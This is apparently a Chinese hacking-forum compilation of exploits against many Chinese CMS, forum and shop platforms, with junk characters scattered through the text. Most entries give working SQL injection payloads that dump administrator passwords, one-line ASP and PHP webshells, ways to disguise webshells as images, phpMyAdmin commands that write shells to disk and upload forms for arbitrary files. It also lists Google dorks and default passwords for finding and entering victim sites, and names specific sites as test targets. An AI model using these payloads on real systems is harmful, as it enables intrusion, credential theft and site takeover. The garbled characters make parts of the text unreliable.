启航企业建站系统 cookie注入漏洞通杀所有版本
, L4 }/ n3 k. Y6 W
* E. B* D. x$ v. N4 y: e直接上exploit:) p0 p6 T! Z7 F! j+ V2 l
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. A" y" C: E! ^1 V* a
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
- N4 m+ B& j0 O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& w( o8 G- y/ K Z! @0 c
Asprain论坛 注册用户 上传图片就可拿到webshell/ v( b9 X3 `, u9 [& \; n2 ]
4 s! N, K5 D. d) @+ n
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
& g6 d% r. N8 j* `' {( k( E1.txt存放你的一句话马 如:<%execute(request("cmd"))%>: b2 K, P7 f+ f9 R# |
2.gif 为一小图片文件,一定要小,比如qq表情图片
: M! L9 T4 U h# D+ y3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用; K, D9 @+ V6 n$ Y7 z& ~. m) g
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
( \" u* E& a* ]6 X8 Q5.q.asp;.gif, O/ Q1 \' L( S% K# z3 B c
google:Powered by Asprain: a# J& G. R8 [/ m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 A4 l( H7 s0 T# z, w: H) S9 j0 e( L7 P* [% u
ShopNum1全部系统存在上传漏洞。
, n9 L5 H2 X5 K/ s( m @7 ]$ l( k" D; s" X( w0 B
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。0 D" B% k" v9 w% Y
按说明 提示登录后台。。
8 Y4 C% f6 `: _0 l- j在后台功能页面->附件管理->附件列表! u' k5 d& [; M% P3 b0 o2 n
可以直接上传.aspx 后缀木马1 t7 S# {. k0 O; a d) r
http://demo.shopnum1.com/upload/20110720083822500.aspx z- K* V: f. ?4 b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 O1 O& J( b- a- Z7 n: U4 P- n g* a' U7 {! ]: r
牛牛CMS中小企业网站管理系统 上传漏洞& T; X* c: V6 K7 o
( r; T0 v& K7 h% h/ _, t8 ?
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
! x* K, [1 R2 B' f. {9 f, H/ p' p后台:admin/login.asp
; Q# R' d: O* {9 E9 H) V( w; I; a+ Cewebeditor 5.5 Nday
1 I$ v1 m5 {( Gexp:
+ g6 O- D; y; x, r" s8 U<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?5 G$ f7 Q7 d) F- R- o% J
<input?type=file?name=uploadfile?size=100><br><br>?
! ]! v, I8 Z( h0 ^<input?type=submit?value=upload>?" w1 x. p7 L |% g6 b! r0 b
</form>
' p. v! x1 o! i I; y0 Sps:先上传小马.. ~' a7 M+ M4 z' K
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
, P1 S a0 w$ M2 d1 d
' }1 a5 [& m$ K) b' e* I( E0 i( o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, w4 J5 [ z2 |) d: ~! e* Q- P
/ g1 n6 P% T1 \: S7 b/ s( Z0 L. a
YothCMS 遍历目录漏洞; H* ^' r W! D6 V4 M3 A5 o
4 } o! q" p0 ^7 V T4 R$ y7 a优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
- ?: A3 ^- A0 n2 l$ V默认后台:admin/login.asp
+ t9 |3 B! l% t3 s. b遍历目录:
; f W2 z h# A* d6 v9 d2 a! Wewebeditor/manage/upload.asp?id=1&dir=../
! [* p" k; N6 }data:
' Z7 W& C. e3 c+ B# f9 ihttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa3 a+ U# ?: j6 n& a4 ?+ T1 Z3 I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Q# w$ H/ X, E; e- r9 [
: j; H" e; m0 h% L. M
Net112企业建站系统 1.07 \/ L6 D2 d& N& {9 k
9 w$ B. `1 g! B7 @# b" Q2 O; y5 e
源码简介:
# Y& q4 s* C- m5 @: n4 B V- CNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
# P6 | ?& `& o; z; \7 P添加管理员:
" J% |- C4 q* f3 @# Phttp://www.0855.tv/admin/admin.asp?action=add&level=2$ f% f7 t. [7 v; B" ~( R( A
其实加不加都不是很重要,后台文件都没怎么作验证。
" _, V+ T) C( _! f5 i, X: `上传路径:
1 n" k U' n1 V( j dhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
% z' Y1 E, Y( bhttp://www.0855.tv/inc/Upfile.asp?Stype=2
- C' \* K" Y6 h6 o% G+ ?4 E' d6 W3 K2 G- p怎么利用自己研究。 I2 ^9 R% P( D
遍历目录:) D4 b6 o; h V, V5 X/ I
http://www.0855.tv/admin/upfile.asp?path=../..* B, O. d+ c. R. R* ^0 D# u( m
如:* K% R+ U! W, U- \! X% ^% o$ }
http://www.0855.tv/admin/upfile.asp?path=../admin: ^, S' C. V0 M: d
http://www.0855.tv/admin/upfile.asp?path=../data1 ^/ C0 ^2 ^# E6 h% q5 _2 G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* K5 f7 D- c8 C* ^! c j
( e( u( N, O8 b1 ^- N. T: \5 S易和阳光购物商城通杀 上传漏洞# b4 [, q7 q, O# K9 ]
6 @: I. `, Q) d. L) X+ Q
前提要求是IIS6.0+asp坏境。
! V$ z" W( y u漏洞文件Iheeo_upfile.asp
: N# Q4 X: L" Z( H5 Y* E过滤不严.直接可以iis6.0上传
6 F; E, U% a. C( b$ T. d' V把ASP木马改成0855.asp;1.gif* o) ?4 F- d! T/ e- }* ^. K$ L
直接放到明小子上传+ [8 e( E. u d/ [; o
Google搜索:inurl:product.asp?Iheeoid=8 E: ?/ R# ^' Q- C# f; @) a$ e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ A, y$ P4 b2 _$ `( q
' F& W5 d5 `9 w0 i( [$ s7 s1 rphpmyadmin后台4种拿shell方法' E2 ]3 l$ `/ l: z% G
3 Z$ q4 T; }+ R! o- b% u- T! \方法一:7 Q5 l6 y6 ~7 w9 @* @( }
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
$ ]! [- q" ~* s. N2 q X; U5 d* ]+ vINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
# o2 u0 ?$ i8 u2 s! kSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';) D' k4 X& x9 L% b+ p: K' k
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php ~* u! o6 N' Q8 I+ s2 A8 _
一句话连接密码:xiaoma8 Z5 Y( n3 a% V& K' P2 s
方法二:
: G( X" Z% U; p! w" JCreate TABLE xiaoma (xiaoma1 text NOT NULL);$ p9 [ y$ e2 |, y% J
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');/ g9 f5 i v, |# b( d& _
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
- m' b* f3 \* eDrop TABLE IF EXISTS xiaoma;3 f2 i; T' F, S# U, [9 Z2 J& i0 n
方法三:3 v' \" e" F4 A% ?; X K: B. B
读取文件内容: select load_file('E:/xamp/www/s.php');
# d0 e& T$ H7 {+ b( ?5 k7 M: b写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php' f9 k, V& J" ~- x1 r7 t* R2 B
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'1 Q# t% g2 _) e' @7 I3 ]
方法四:
0 n$ V7 T+ S% Rselect load_file('E:/xamp/www/xiaoma.php');$ Q* A1 `& R0 K1 V; S% j! l7 n
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
9 F4 F' `) @$ n* E) f然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir; s! }8 H4 J$ y! d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- F( I& V2 U0 M7 l& P2 j% Q0 f2 ]' k* q7 a
传信网络独立开发网站源码0day漏洞
3 z: U) I8 P4 y3 k0 g- d- y
9 H7 x) |& s+ h- K' y% ]后台system/login.asp5 L2 w+ b# X [+ [; e" G
进了后台有个ewebeditor
1 F* X! y" G3 B, R' wGoogle 搜索inurl:product1.asp?tyc=) Q8 l- r! e( L+ i
编辑器漏洞默认后台ubbcode/admin_login.asp* y" Z. W" r# w2 _2 c3 }
数据库ubbcode/db/ewebeditor.mdb& v3 G; s& ]3 P) H- U0 t: m
默认账号密码yzm 111111
7 y/ q2 y$ @% {2 b% h8 H4 g
4 G& B9 H; V! k9 c1 X拿webshell方法
3 q# j/ }, x1 P: N& o登陆后台点击“样式管理”-选择新增样式
5 b# v3 P' V8 ^' e9 ^样式名称:scriptkiddies 随便写 - N$ M9 o: e4 x- n# b
路径模式:选择绝对路径
8 ~: s3 K: O! ^- a q* L, l8 i图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
$ p$ }4 ~) f s% ]; q图片类型比如就是我们要上传的ASP木马格式9 Q# g& z3 r2 k: B) S6 \# C
上传路径:/, x6 a; {% Y) ^9 _, ^+ ?& h9 }. h N/ t+ D
图片限制:写上1000 免的上不了我们的asp木马7 q) K" e: S: O
上传内容不要写
5 f3 B/ x9 u4 ]+ R( `3 \: h6 {可以提交了
9 {2 q/ _6 O& [8 {7 r# b# s样式增加成功!
' C! G4 I8 P3 J7 O6 x& ]' u返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 7 {# e1 y0 t7 ]3 K
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置/ k) m# A! q4 z& b' e
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
4 {( N8 k& ^. m# N上ASP木马 回车 等到路径3 l9 y3 a0 a" f- L7 n$ ~$ _1 r* `) z! e9 F9 R
8 \& e- M; [0 L5 s后台:system/login.asp! q8 {* x r% `
Exp:
' `" l9 Q8 K. w. E. w/ zand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
. r7 ]7 D+ I; c ?; l8 D2 F测试:
5 N4 Y" l. l) t+ L( [http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master2 _3 [- v* a* p+ \
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
# g4 c2 e6 O- ]9 Z+ F$ z5 C+ U. _/ B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, M, T/ }# t, Z7 f
! S* ~* Y V' V9 p8 t1 s) [foosun 0day 最新注入漏洞
" [: t1 T4 c/ h7 ^; b3 a( R
+ H, V3 L5 r4 I漏洞文件:www.xxx.com/user/SetNextOptions.asp- o/ ~: h j1 @6 F: _' i" u
利用简单的方法:/ M' e: [/ |2 S4 s
暴管理员帐号:
+ X. w% Y! Y2 L! e" V8 Uhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
1 B9 b% v( q% w E1 r7 g4 d暴管理员密码:3 h* x$ H8 A' d; X& F: F
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,, B5 R7 _0 \5 m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 x+ x) o; H, \7 R" R: h% g9 d# r# W7 g0 K" F. A* K0 c
网站程序的版权未知!. I$ o- W) Q* P/ l: W$ A5 R$ X; L- a8 W
, b/ s- c1 j4 |: F
默认网站数据库:2 t- q) q: ^/ O/ C/ l
www.i0day.com/data/nxnews.mdb- G' K3 k0 z- L1 h+ H# b3 P
ewebeditor 在线编辑器:: x% o3 _$ h' k. X7 ?1 a+ ?: w
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb# K" Q1 u/ p0 n
登录地址:ewebeditor/admin_login.asp
" _3 u7 x, e4 f3 ~默认密码:admin admin2 [7 L; \" f" Q% y7 I
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
7 @0 {! [0 {: ]2 S8 o' Z! y) [! [8 B! A. Q B
Sql注入漏洞:/ B! C( i- A. q' b3 K7 `1 A& f
http://www.i0day.com/detail.asp?id=12
+ m& Q/ c w- t: v1 c7 e4 eexp:) l S: B# j3 V) Z; q
union select 1,admin,password,4,5,6,7,8 from admin
% _; B& e9 C8 `3 P" n& Z( p爆出明文帐号/密码% W6 d: i2 \/ t* k& `3 i
: O& J- Y$ M9 s2 V2 ?
上传漏洞:
5 l1 ]! R, K& @( l% r后台+upfile.asp
* ^6 T5 J; R3 s- M e如:. P: \6 e7 `) K5 f; l2 s. D2 d
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。1 U( b$ y6 N1 U5 H% t/ [
shell的地址:网址+后台+成功上传的马
5 L/ L$ H4 W5 u+ Q* mgoogle:inurl:news.asp?lanmuName=
) b; S- J6 u1 V! `" z9 k' e4 W------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 Y/ d$ j4 @5 u( W+ |# `
+ Z! q7 N- w* G+ c2 @/ S: Sdedecms最新0day利用不进后台直接拿WEBSHELL
! e# T# B1 l& W8 D- G F6 |8 @+ k2 _8 K/ u) C7 L
拿webshell的方法如下: Y1 ^; {# O4 B$ }# l- ]8 h
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.# e! v7 k7 ^/ k d. t* n
前题条件,必须准备好自己的dede数据库,然后插入数据:
- f4 b, i- A7 X# _( H0 Dinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
! F' P$ i b: ?6 K, q( }
- l6 e+ C& `/ W9 l, W再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。- S! Y6 Z: n: A' ~
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> B# r) [4 W9 w" c: v! b
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
) D- x# p' E8 S; u' H<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
5 C: t& i. B* m<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />4 b: t& G2 E) e3 H( D4 j G
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />9 a9 G2 n; ]4 o8 x
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- Y$ _) Q) ^+ W/ ~, V
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; D. C1 n8 O u4 D! q<input type="text" value="true" name="nocache" style="width:400">7 }3 i" B) k1 X8 |
<input type="submit" value="提交" name="QuickSearchBtn"><br />
7 x( K9 m! ^+ e$ l5 a+ s5 v; s</form>+ Z) `/ I- Y q$ G
<script>
2 Y/ v3 W$ q4 j$ C! S2 Y5 @function addaction()% r7 w, Q9 \* l9 y# Y4 U3 H
{- _$ e8 }: ]' L; G1 s
document.QuickSearch.action=document.QuickSearch.doaction.value;: k4 V' T, ~- r9 u8 M; V
}% `9 T1 ~0 W4 a, X8 R
</script>
) `9 R! D% r- }9 `; z- W& L, \-----------------------------------------------------------------------------------------------------------------------------------------------" n+ `4 O0 x0 i2 m
- P8 R0 V( ^3 x" J: ^3 r
dedecms织梦暴最新严重0day漏洞
/ K; [( r3 }- k: q/ ubug被利用步骤如下:
, N" H2 `! S9 f: v% ?http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
8 [+ c8 o& P4 s/ k9 O把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 L7 j: }! M8 g" U-------------------------------------------------------------------------------------------------------------------------------------------3 e8 O! M5 |; [9 o6 b1 v" O2 L! m
/ k( H' w9 D9 r. P! t8 q5 k多多淘宝客程序上传漏洞 2 {7 s5 d! o, z! S
漏洞页面:
5 `0 y) g3 }# e+ T h% ~admin\upload_pic.php
2 t8 Y& x. F7 J6 `# R5 F传送门:
* T9 L3 h; s7 }8 ghttp://www.www.com/admin/upload_pic.php?uploadtext=slide1) u) X$ T" x( y2 f$ K8 L* r
PS:copy张图片马 直接 xxx.php 上传抓包地址!
' x7 x S8 S, x( ?. A; o: Q------------------------------------------------------------------------------------------------------------------------------------------------------
0 @/ E3 o( G4 {' k3 ?- j3 t/ {2 h) {, {# i9 V5 g# b2 C5 A, a
无忧公司系统ASP专业版后台上传漏洞
" g$ o% V) u2 I2 V1 i漏洞文件 后台上传8 s5 l7 [* W, ^5 |' y9 p6 o5 b
admin/uploadPic.asp
M9 E; j# A3 F3 ?# w; ]漏洞利用 这个漏洞好像是雷池的
4 K& S1 q: m5 {" Y( Ihttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=16 _* f9 z& g6 _' k- B- `' @8 }
等到的webshell路径:: v4 c' p P% X3 z' W) X9 ~
/UploadFiles/scriptkiddies.asp;_2.gif/ B" K! X' Q! G! I
---------------------------------------------------------------------------------------------------------------------------------------------------
( B! `+ X7 e, r1 d. Z! v- v; M( \# \6 W
住哪酒店分销联盟系统2010. p' t9 C" j$ R. W
Search:
, ?- @ X1 P% p6 P+ O$ minurl:index.php?m=hotelinfo
7 y* A3 w/ g& d6 @6 |http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
' s; @9 E2 z% J6 A4 `默认后台:index.php?m=admin/login9 M0 Y* i# k: a, K3 _/ [
--------------------------------------------------------------------------------------------------------------------------------------------------- F, D( a: V2 t$ ~. ^4 f+ v
' g# U& h9 Z+ ?- a/ I
inurl:info_Print.asp?ArticleID=
& S9 b, F" N: v7 L( r后台 ad_login.asp8 B' W z+ a- K* J
爆管理员密码:
* h: s3 A5 `- P6 `- \7 \9 I, Eunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
$ G0 p0 g& i% `3 i r------------------------------------------------------------------------------------------------------------------------------------------------------------
8 E+ y' g9 j2 o; o6 o6 m8 W5 d6 {
p7 b6 A7 H' _& x2 I搜索框漏洞!
7 J' l- @7 S9 c" |6 p4 r6 F%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
; z9 e7 \1 j8 b+ k--------------------------------------------------------------------------------------------------------------------------------------------------------, _4 @& Z# a: m3 A) @. t5 v/ _
% i$ {7 y) q( }; N D
关键字:
4 x; P1 J* l0 |inurl:/reg_TemletSel.asp?step=2
! \6 f7 @, U( ]) e或者) ^! e' b5 ~4 Q9 w- H
电子商务自助建站--您理想的助手# l6 _ m" r2 [* R
-------------------------------------------------------------------------------------------------------------------------------------------------
# p+ Q7 L5 \7 R* u" O
" W! W0 d, ~# G" HiGiveTest 2.1.0注入漏洞
$ N2 \& T( I ^7 bVersion: <= 2.1.06 H8 K4 q' X2 z; s& \
# Homepage: http://iGiveTest.com/7 X4 s, O7 Q8 T
谷歌关键字: “Powered by iGiveTest”- j: ^% Q" ~6 U) y' h) T: y' @3 t
随便注册一个帐号。然后暴管理员帐号和密码0 I Y# E. A% Y( c4 i
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1% f9 L: j1 r5 c2 u6 |% Z n
------------------------------------------------------------------------------------------------------------------------------------------------4 L Y5 U2 Y6 k; S
: r# P* _( ]9 \5 T- c( N% h7 j
CKXP网上书店注入漏洞$ e) r b2 G( r- b4 O# Z* s
工具加表:shop_admin 加字段:admin! R) k! x6 \. b# G3 f
后台:admin/login.asp
7 Z9 ?4 d5 [% M( \# ^" I6 c! l登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/9 ^+ @2 G3 h" @& g5 p. G6 K* G! {$ q
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
' q. T( ]. I+ O% a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ t. g: Z! {9 R8 M4 m& n* ?
8 \$ Z9 s6 {' G7 N段富超个人网站系统留言本写马漏洞
, F1 F' W" y6 E* \源码下载:http://www.mycodes.net/24/2149.htm
# S( ?/ P4 k2 ~addgbook.asp 提交一句话。" N, E0 \1 \9 D
连接: http://www.xxxx.tv/date/date3f.asp' S, t. R/ Q$ |. w) a, z0 B" m6 j
google:为防批量,特略!
4 N9 i' G7 V0 u, s* p-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; X4 N/ E+ p. T/ i, c' Z O
' ?) m _5 U" g; C7 C8 _ V智有道专业旅游系统v1.0 注入及列目录漏洞
. m* k& K8 y& T* ~) f# K默认后台路径:/admin/login.asp' u% w& {" T" F, N
默认管理员:admin
, |; ?- A+ }1 Z; g6 c- t* u2 g默认密码:1234560 z1 o' ?# q5 |. _" w( ]
SQL EXP Tset:3 i+ ]' Z7 k( P& e% v; `4 m
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
; r! o" p) g; @6 t9 H' {------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 s/ H' A6 @' ^0 h0 B) [
) f4 V+ P3 m2 R0 g, p) M8 A$ K. Rewebeditor(PHP) Ver 3.8 本任意文件上传0day
2 ~- n2 @$ }7 r" d2 b1 m- _! VEXP:) J, a' R) S8 m, i H
<title>eWebeditoR3.8 for php任意文件上EXP</title>7 q. Y* ~' o7 g5 n; h; H
<form action="" method=post enctype="multip
2 f, A3 G: ]! q ~% A% lart/form-data"> 0 p5 r: W4 z4 ]0 a- y' i
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 0 ^6 T/ i' W( { l" r9 B+ ^
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
3 ~0 m( O1 ?, x& _) h7 ?, c<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> , s/ I) H0 g% f4 d3 N
file:<input type=file name="uploadfile"><br> ' }4 l' r/ q/ t, T% ~1 t, p
<input type=button value=submit onclick=fsubmit()> 3 @# j1 p0 D) ]
</form><br> 5 u, u" k( d# K. w4 W1 A8 H! K
<script> L% I2 Y p" {4 Q+ J" [
function fsubmit(){ 8 ]1 y; x5 b, O; l3 ^; E
form = document.forms[0];
. k: |) M' m% S4 tform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; N9 W0 S. h' t- i1 c
alert(form.action);
. G5 J% Q5 v, \0 Z8 ?9 l. zform.submit(); 7 i( [8 p' o0 b0 L1 Z+ l1 l& [
} Z6 D" Q$ X6 _9 A
</script>
9 N- G4 n, @5 ~* Y2 Z注意修改里面ewebeditor的名称还有路径。- D+ F! {3 X2 F( o8 p
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 \) I7 E0 s$ k8 [) X4 @) y% b) k% R
" Y8 ^: t2 q$ ~! {$ Z) C8 f$ L
提交’时提示ip被记录 防注入系统的利用: j0 H) _! e8 M/ [. X" S! N1 p* r
网址:http://www.xxx.com/newslist.asp?id=122′
4 e' W0 f3 ?, L8 q4 q; U提示“你的操作已被记录!”等信息。
; G+ [$ _* V- J7 k利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。$ S9 u; u: O; `- {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ e2 F4 g. M: F9 B, G' w5 _% \
# _8 j0 Z( v7 D( }+ j
西部商务网站管理系统 批量拿shell-0day
/ O5 K$ H% M2 }1 ?+ U% u9 U- {0 m9 y, d这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 9 x- k5 S8 Q7 O
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
+ t p, F, o/ ]. q* K! j' c2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合: \) q2 K5 ~9 Y" Y) ` o/ w
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
' N: A' k( W, q% N---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 {( m' s9 |1 Y& y# a. t7 x! n$ ]& B6 d7 U3 @8 {' B2 {7 u
JspRun!6.0 论坛管理后台注入漏洞
0 j! V% K0 P: f( B S% z
% ?: k- c% T5 Y7 d5 Z6 A7 }SEBUG-ID:20787 发布时间:2011-04-30 影响版本:% j7 v l& I0 T* t
JspRun!6.0 : e3 S( [. E' c# V
漏洞描述:& p9 O z2 o' C, E
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
5 I+ [+ |7 z* w1 q在处理后台提交的文件中ForumManageAction.java第1940行. \2 d$ B; x* p/ q) l
String export = request.getParameter("export");//直接获取,没有安全过滤3 S, L/ m3 K8 }7 X. L
if(export!=null){' s# E% L. x# s- ~
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...) j z. w. ?& U1 k3 B
if(styles==null||styles.size()==0){
; P% G% J: t' C6 U9 d& L<*参考
0 g4 [) e% u- Q3 Hnuanfan@gmail.com
9 E; u# ~$ B4 o {; V& f*> SEBUG安全建议:% `9 |" J2 s/ v7 N+ l
www.jsprun.net/ U) s7 }) {1 P" E Y8 w8 [
(1)安全过滤变量export
, Q" e: D4 n8 Z- W(2)在查询语句中使用占位符
7 F0 `9 R6 x1 f- j4 \+ d------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 X0 m5 Z3 @3 T2 a7 B. O1 `! D u* G
乌邦图企业网站系统 cookies 注入6 A5 g8 N. e/ w6 N7 @4 Y
1 ?, r, z$ F. U- V
程序完整登陆后台:/admin/login.asp
/ t1 T" f( `! Y! f, ?默认登陆帐号:admin 密码:admin888
) W+ o9 P! k/ r8 V$ q# C语句:(前面加个空格)
, g# N# D9 T/ T y; Vand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
& N3 X' L0 K, S7 g( q4 c或者是16个字段:
1 s2 w( K5 T/ [5 A) E9 W4 Hand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
. [+ f$ K c2 R* v( V+ `爆不出来自己猜字段。
1 f, F1 `! P; t# T2 ?5 }; n' e注入点:http://www.untnt.com/shownews.asp?=88: q$ N' W( P5 j! h
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
* G8 }. _( g9 I5 k5 W6 b1 p关键字:
) ^9 w+ i! r* c8 `+ E" sinurl:shownews?asp.id=9 D8 |0 b, b8 R& Y* S! c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 o' N! g& m# ~& b$ V3 S4 R$ o3 _( `! S0 w/ K( g
CKXP网上书店注入漏洞
' W3 w4 [6 C J1 U
4 C6 r, }, Z9 o0 L' @8 N2 {' K9 r h工具加表:shop_admin 加字段:admin
% s$ `2 Q9 f1 x* W) |! Z后台:admin/login.asp 6 R) J& O6 Y j; } c2 O: b
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
* |2 r% \4 o# Ginurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息( ^. w5 _. s6 c I
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------& S, \; ?" ~, B8 e$ n6 R
( J, \8 l& O& nYxShop易想购物商城4.7.1版本任意文件上传漏洞
0 @9 L9 v$ I- p$ u" k: |5 n+ z* x+ {+ X5 n" u
http://xxoo.com/controls/fckedit ... aspx/connector.aspx8 A6 K% o# @, c& f
